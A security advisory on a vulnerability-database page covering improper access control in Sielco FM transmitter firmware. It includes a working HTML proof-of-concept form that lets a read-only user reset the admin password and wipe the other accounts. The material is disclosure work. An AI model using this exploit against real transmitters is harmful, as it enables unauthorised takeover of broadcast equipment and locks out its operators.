Lucene search

K

Sielco Analog FM Transmitter 2.12 Improper Access Control Change Admin Password

🗓️ 28 Mar 2023 00:00:00Reported by Gjoko KrsticType 
zeroscience
 zeroscience
🔗 zeroscience.mk👁 196 Views

Sielco Analog FM Transmitter 2.12 Improper Access Control Change Admin Password. Improper access control allows users with read permissions to manipulate passwords and permissions, including the admin password, via a single HTTP POST request

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Related
Code
<!--

Sielco Analog FM Transmitter 2.12 Improper Access Control Change Admin Password


Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: 2.12 (EXC5000GX)
                  2.12 (EXC120GX)
                  2.11 (EXC300GX)
                  2.10 (EXC1600GX)
                  2.10 (EXC2000GX)
                  2.08 (EXC1600GX)
                  2.08 (EXC1000GX)
                  2.07 (EXC3000GX)
                  2.06 (EXC5000GX)
                  1.7.7 (EXC30GT)
                  1.7.4 (EXC300GT)
                  1.7.4 (EXC100GT)
                  1.7.4 (EXC5000GT)
                  1.6.3 (EXC1000GT)
                  1.5.4 (EXC120GT)

Summary: Sielco designs and produces FM radio transmitters
for professional broadcasting. The in-house laboratory develops
standard and customised solutions to meet all needs. Whether
digital or analogue, each product is studied to ensure reliability,
resistance over time and a high standard of safety. Sielco
transmitters are distributed throughout the world and serve
many radios in Europe, South America, Africa, Oceania and China.

Desc: The application suffers from improper access control when
editing users. A user with Read permissions can manipulate users,
passwords and permissions by sending a single HTTP POST request
with modified parameters and edit other users' names, passwords
and permissions including admin password.

Tested on: lwIP/2.1.1
           Web/3.0.3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5756
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5756.php


26.01.2023

--><html>
<body>
<form action="http://transmitter/protect/users.htm" method="POST">
<input name="pwd0" type="hidden" value="PWDCHANGED"/> <!-- This will set/modify admin pwd -->
<input name="pwd0bis" type="hidden" value="PWDCHANGED"/> <!-- This will set/modify admin pwd -->
<input name="user1" type="hidden" value=""/> <!-- This will set/modify user1 -->
<input name="pwd1" type="hidden" value=""/> <!-- This will set/modify user1 pwd -->
<input name="pwd1bis" type="hidden" value=""/> <!-- This will set/modify user1 pwd -->
<input name="auth1" type="hidden" value="0"/> <!-- This will set user1 read perm -->
<input name="user2" type="hidden" value=""/> <!-- This will set/modify user2 -->
<input name="pwd2" type="hidden" value=""/> <!-- This will set/modify user2 pwd -->
<input name="pwd2bis" type="hidden" value=""/> <!-- This will set/modify user2 pwd -->
<input name="auth2" type="hidden" value="0"/> <!-- This will set user2 read perm -->
<input name="user3" type="hidden" value=""/> <!-- This will set/modify user3 -->
<input name="pwd3" type="hidden" value=""/> <!-- This will set/modify user3 pwd -->
<input name="pwd3bis" type="hidden" value=""/> <!-- This will set/modify user3 pwd -->
<input name="auth3" type="hidden" value="0"/> <!-- This will set user3 read perm -->
<input type="submit" value="Modify admin pwd, delete all users"/>
</form>
</body>
</html>

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
28 Mar 2023 00:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS36.5
EPSS0.00054
SSVC
196
.json
Report